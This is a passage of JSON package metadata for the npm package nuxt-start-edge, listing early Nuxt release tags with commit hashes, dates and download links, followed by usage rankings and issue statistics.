null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2026-02-13T18:02:57.535Z","dependent_packages_count":1,"downloads":2177,"downloads_period":"last-month","dependent_repos_count":2,"rankings":{"downloads":2.7054410961791358,"dependent_repos_count":7.613224151458317,"dependent_packages_count":20.911788993680194,"stargazers_count":0.15564167441745766,"forks_count":0.5232519525968256,"docker_downloads_count":null,"average":6.381869573666386},"purl":"pkg:npm/nuxt-start-edge","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/nuxt-start-edge","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/nuxt-start-edge","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/nuxt-start-edge/dependencies","status":null,"funding_links":["https://opencollective.com/nuxtjs","https://github.com/sponsors/nuxt"],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T18:00:30.319Z","issues_count":6007,"pull_requests_count":6866,"avg_time_to_close_issue":11690528.2843204,"avg_time_to_close_pull_request":786776.4495867769,"issues_closed_count":4402,"pull_requests_closed_count":6050,"pull_request_authors_count":588,"issue_authors_count":3402,"avg_comments_per_issue":4.151489928416847,"avg_comments_per_pull_request":2.496213224584911,"merged_pull_requests_count":5386,"bot_issues_count":12,"bot_pull_requests_count":2972,"past_year_issues_count":940,"past_year_pull_requests_count":1678,"past_year_avg_time_to_close_issue":711939.6998050682,"past_year_avg_time_to_close_pull_request":221172.79485238457,"past_year_issues_closed_count":513,"past_year_pull_requests_closed_count":1321,"past_year_pull_request_authors_count":141,"past_year_issue_authors_count":674,"past_year_avg_comments_per_issue":2.2457446808510637,"past_year_avg_comments_per_pull_request":3.4153754469606676,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":694,"past_year_merged_pull_requests_count":1175,"issues_url":"https://issues.ecosyste